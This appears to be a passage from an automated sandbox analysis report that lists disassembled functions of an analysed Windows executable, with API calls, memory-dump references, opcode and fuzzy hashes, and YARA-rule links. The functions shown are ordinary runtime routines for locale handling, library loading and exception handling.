                                                                                                                                                                      • Instruction Fuzzy Hash: DE11E322A1C762C2E7649B12E2426BA22A0FF40760F505239EB2D876C4DE7ADCD1C344
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686061EAC, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: GetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AA8B
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: SetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AB29
                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF686062583,?,00000000,00000092,?,?,00000000,?,00007FF686053865), ref: 00007FF686061F2A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                      • Opcode ID: 414a7d8bcd28c5aaec5432a5239753928f2f72435bd74e4b9177781ac132efac
                                                                                                                                                                      • Instruction ID: 817a87e568cdff91a00c2e1df8ced3d73edf181533131e374829bdef55b6154e
                                                                                                                                                                      • Opcode Fuzzy Hash: 414a7d8bcd28c5aaec5432a5239753928f2f72435bd74e4b9177781ac132efac
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E01F572F08382C6E7104F59E6407B97691FF507A5F409235D728876C4DF2A9CC0C704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605E9AC, Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF68605EDED,?,?,?,?,?,?,?,?,00000000,00007FF686061428), ref: 00007FF68605E9FB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnumLocalesSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2099609381-0
                                                                                                                                                                      • Opcode ID: acca8e06036fa26cda827cf0d0c46fb16290ef589396ff1278c75226b8d020e2
                                                                                                                                                                      • Instruction ID: 883da699afe571e45a94fd8cd2b63d8e46c6ae76e244b285ff5def3e079a7c99
                                                                                                                                                                      • Opcode Fuzzy Hash: acca8e06036fa26cda827cf0d0c46fb16290ef589396ff1278c75226b8d020e2
                                                                                                                                                                      • Instruction Fuzzy Hash: E9F069B2A08A81C2E700DB25FA421A933A1FF88780F149039EA5DC3364CF3DD860C708
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605F470, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                      • Opcode ID: 1f1bd0aa73ed271562bb62be82e8cca7d1819b292aaca4c8593cc6156965938b
                                                                                                                                                                      • Instruction ID: 68a181377706bf53f0762150d391d4754067e00925a4337c73ad7d52c31814a4
                                                                                                                                                                      • Opcode Fuzzy Hash: 1f1bd0aa73ed271562bb62be82e8cca7d1819b292aaca4c8593cc6156965938b
                                                                                                                                                                      • Instruction Fuzzy Hash: 54B09220E4BB86C2EA086B126D8231422A4BF48B01F94403CC10C82320DE2D28FA8709
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686065C70, Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 48aecbf6e4f5e4f2ab791a2821a0037e7b57605b538f67f9e802278abed0d989
                                                                                                                                                                      • Instruction ID: c5c3d7f851f75cf71b1e1ba015b281fdd05f40eaa8e87131d5c611b8005aef2f
                                                                                                                                                                      • Opcode Fuzzy Hash: 48aecbf6e4f5e4f2ab791a2821a0037e7b57605b538f67f9e802278abed0d989
                                                                                                                                                                      • Instruction Fuzzy Hash: 07F04F71B196998BDBA9CF28A94362977E0FB48381B90803DD6C9C3A14DA3D9460CF48
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68604761C, Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f682eef939d4f27dcb83ebabbd23bb9e00d87743710599fb58a33550c2039605
                                                                                                                                                                      • Instruction ID: 83d93b3f13a474f70aa3c8bb11f1e04cd1fbd3ec525afaf9fc4a8034ac8b26f4
                                                                                                                                                                      • Opcode Fuzzy Hash: f682eef939d4f27dcb83ebabbd23bb9e00d87743710599fb58a33550c2039605
                                                                                                                                                                      • Instruction Fuzzy Hash: F3B0929E158108AC6027BA907E04C3C02202E90BB0E104038BD18466829C513CDC40AA
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6860473EC, Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b553633bf39dd50b8d26a9c93329177b76d2817bb979d2caf3d56cb44219cc2c
                                                                                                                                                                      • Instruction ID: 12d03757237832d8a327e4cf823fabfd83ca2c4f048eddbd5c6521b63b9925ac
                                                                                                                                                                      • Opcode Fuzzy Hash: b553633bf39dd50b8d26a9c93329177b76d2817bb979d2caf3d56cb44219cc2c
                                                                                                                                                                      • Instruction Fuzzy Hash: B8B0929B1180096D6027BA517E00CBC01212B90BA4F524038BD2542A839C546CDC40A6
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686047494, Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 48f34821b9ba8f15c474d6c92f36921c65b95940b221e3e75f47e07dd42d1ce8
                                                                                                                                                                      • Instruction ID: 31e2628e71efa91dde95c7771e9277eedde3a20b1ee64a59436b45d288ad3591
                                                                                                                                                                      • Opcode Fuzzy Hash: 48f34821b9ba8f15c474d6c92f36921c65b95940b221e3e75f47e07dd42d1ce8
                                                                                                                                                                      • Instruction Fuzzy Hash: 59B092AA1190086C702BBA617E04C3C01202A91BA0F514438BD14426829C512CDC80A6
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686047478, Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 60e118eea2d8d078f7afecea54d0c11a10dfe55c462b275dd058b16b969c6ad7
                                                                                                                                                                      • Instruction ID: 1322d1dc60725ebd63edda987c5f6beb1ae0836f68c31d57d6014cdbab8e66ee
                                                                                                                                                                      • Opcode Fuzzy Hash: 60e118eea2d8d078f7afecea54d0c11a10dfe55c462b275dd058b16b969c6ad7
                                                                                                                                                                      • Instruction Fuzzy Hash: B7B092DA11910E7CB427BE60BE02C3C0120AE80BA4E504038BE1442A829C502CDC8066
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686048210, Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 90b10ee0c6c077fc33436f082a8d218a6375381c475752e686c9b273dc00cf7f
                                                                                                                                                                      • Instruction ID: c82d4fea0dbce7d26453d0f495c1455319f1198dbd7e9cd3f1c9afeb22b3f7a4
                                                                                                                                                                      • Opcode Fuzzy Hash: 90b10ee0c6c077fc33436f082a8d218a6375381c475752e686c9b273dc00cf7f
                                                                                                                                                                      • Instruction Fuzzy Hash: D1A001A190CD82D0E6649B00AB502202221BF64308B40047AD10D950A0DE6EAC40D20A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605F29C, Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F2B7
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F2D6
                                                                                                                                                                        • Part of subcall function 00007FF68605EA28: GetProcAddress.KERNEL32(?,?,00000005,00007FF68605EF06,?,?,8000000000000000,00007FF68605AC42,?,?,8000000000000000,00007FF686056A2D), ref: 00007FF68605EB80
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F2F5
                                                                                                                                                                        • Part of subcall function 00007FF68605EA28: LoadLibraryW.KERNELBASE(?,?,00000005,00007FF68605EF06,?,?,8000000000000000,00007FF68605AC42,?,?,8000000000000000,00007FF686056A2D), ref: 00007FF68605EACB
                                                                                                                                                                        • Part of subcall function 00007FF68605EA28: GetLastError.KERNEL32(?,?,00000005,00007FF68605EF06,?,?,8000000000000000,00007FF68605AC42,?,?,8000000000000000,00007FF686056A2D), ref: 00007FF68605EAD9
                                                                                                                                                                        • Part of subcall function 00007FF68605EA28: LoadLibraryExW.KERNEL32(?,?,00000005,00007FF68605EF06,?,?,8000000000000000,00007FF68605AC42,?,?,8000000000000000,00007FF686056A2D), ref: 00007FF68605EB1B
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F314
                                                                                                                                                                        • Part of subcall function 00007FF68605EA28: FreeLibrary.KERNEL32(?,?,00000005,00007FF68605EF06,?,?,8000000000000000,00007FF68605AC42,?,?,8000000000000000,00007FF686056A2D), ref: 00007FF68605EB54
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F333
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F352
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F371
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F390
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F3AF
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F3CE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                      • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                                                                                                                      • API String ID: 3255926029-3252031757
                                                                                                                                                                      • Opcode ID: 7ae8db01b808dd89840a75df8cabf87d40bbb11ba067a80d5ff1f2e4a99f70d4
                                                                                                                                                                      • Instruction ID: a305803ea335ee9394e714d6a33a4c3709864a071249b8eb69b8d4abdda998d8
                                                                                                                                                                      • Opcode Fuzzy Hash: 7ae8db01b808dd89840a75df8cabf87d40bbb11ba067a80d5ff1f2e4a99f70d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 27315864A18A47E0F608DB64EA656E42331BF04340FC0947FD14DA61A5DE7FBE4AC389
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686045DE0, Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 340COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID: [!] PAUSE$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                      • API String ID: 2081738530-3229271104
                                                                                                                                                                      • Opcode ID: 4b47cfc8a2ab3d0877d47af7543c7d0808fcd3ae3f20c1146f8bb5cf32415501
                                                                                                                                                                      • Instruction ID: 32141329ef6e7bd65f1c63e4844439822cc74ef34a3860c1ecb7c57c7326a7c4
                                                                                                                                                                      • Opcode Fuzzy Hash: 4b47cfc8a2ab3d0877d47af7543c7d0808fcd3ae3f20c1146f8bb5cf32415501
                                                                                                                                                                      • Instruction Fuzzy Hash: 57E19122A19A41C2EB31CF15E68027967A1FF94F98F588139DA4E877A5DF7EDC41C308
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686043720, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 255COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                      • API String ID: 459529453-1866435925
                                                                                                                                                                      • Opcode ID: 5f5df7f7e40a59f312fc8a143b46a986f631a95f737e9221bd87bb5ff3ae644f
                                                                                                                                                                      • Instruction ID: 29f03696557907720b198715755e7f096bc2c095c7ab88138dcc52edbaa3f497
                                                                                                                                                                      • Opcode Fuzzy Hash: 5f5df7f7e40a59f312fc8a143b46a986f631a95f737e9221bd87bb5ff3ae644f
                                                                                                                                                                      • Instruction Fuzzy Hash: CFB1C122A09B81C5EB78DB16D6813B973A0FF94B88F145139DA8D837A5CFBED845C344
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686046A70, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 151COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name$false$true
                                                                                                                                                                      • API String ID: 4121308752-1062449267
                                                                                                                                                                      • Opcode ID: 256ba47f0a3104a408f78f23f5bd29fedbbc963243aadb4ade784fd86df6194a
                                                                                                                                                                      • Instruction ID: fc10159fbe0991653f5b9d05b9e167be5635d115586dc3a318c030450a76bb47
                                                                                                                                                                      • Opcode Fuzzy Hash: 256ba47f0a3104a408f78f23f5bd29fedbbc963243aadb4ade784fd86df6194a
                                                                                                                                                                      • Instruction Fuzzy Hash: 72618C22A19741CAEB20DF60D6502BC33A1FF54748F044539DA4DA7A9AEF7EE856C308
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68604D0BC, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 3606184308-393685449
                                                                                                                                                                      • Opcode ID: ad7ed73937a1dd237070555565f728518e44f666302cee83b44181870f8f7486
                                                                                                                                                                      • Instruction ID: 49f3945e73d2cbc3b13e43633530bc4f3dc49c16666c7d1e6dcef67b82b0550e
                                                                                                                                                                      • Opcode Fuzzy Hash: ad7ed73937a1dd237070555565f728518e44f666302cee83b44181870f8f7486
                                                                                                                                                                      • Instruction Fuzzy Hash: A5D16C72A08B45CAEB309B6596403AD77A0FF6579CF100139EE8D97B99CF79E890C704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686064680, Relevance: 10.8, APIs: 7, Instructions: 291COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 08f01eb79f23ea84d5b34666e47ea11fa686799f9f2bf542ccd6449e8e36f088
                                                                                                                                                                      • Instruction ID: 87701c62db9e9af1ae1d20139acfc62025af552257767dd0143f00a16c64de0f
                                                                                                                                                                      • Opcode Fuzzy Hash: 08f01eb79f23ea84d5b34666e47ea11fa686799f9f2bf542ccd6449e8e36f088
                                                                                                                                                                      • Instruction Fuzzy Hash: 66C10432A1C782D5EA219B1092042BD7B90FF41B84F458239DB4E8B391CF7EEC95C748
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68604F8CC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF68604FB7A,?,?,?,00007FF68604F7F4,?,?,?,?,00007FF68604B8CD), ref: 00007FF68604F94F
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF68604FB7A,?,?,?,00007FF68604F7F4,?,?,?,?,00007FF68604B8CD), ref: 00007FF68604F95D
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF68604FB7A,?,?,?,00007FF68604F7F4,?,?,?,?,00007FF68604B8CD), ref: 00007FF68604F987
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF68604FB7A,?,?,?,00007FF68604F7F4,?,?,?,?,00007FF68604B8CD), ref: 00007FF68604F9CD
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF68604FB7A,?,?,?,00007FF68604F7F4,?,?,?,?,00007FF68604B8CD), ref: 00007FF68604F9D9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                      • Opcode ID: b761e5433ce2450e37b89b641fd627801baa61bd38bef159c72b63580617267b
                                                                                                                                                                      • Instruction ID: 4d20c5b568b6690d399c45c23ecb5bc21c8312f2b688221ce8561c55f19a10ec
                                                                                                                                                                      • Opcode Fuzzy Hash: b761e5433ce2450e37b89b641fd627801baa61bd38bef159c72b63580617267b
                                                                                                                                                                      • Instruction Fuzzy Hash: A1317666A1A742E1EE719F02AA006753394FF94B98F590539DD5D8B390DFBEEC81C308
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

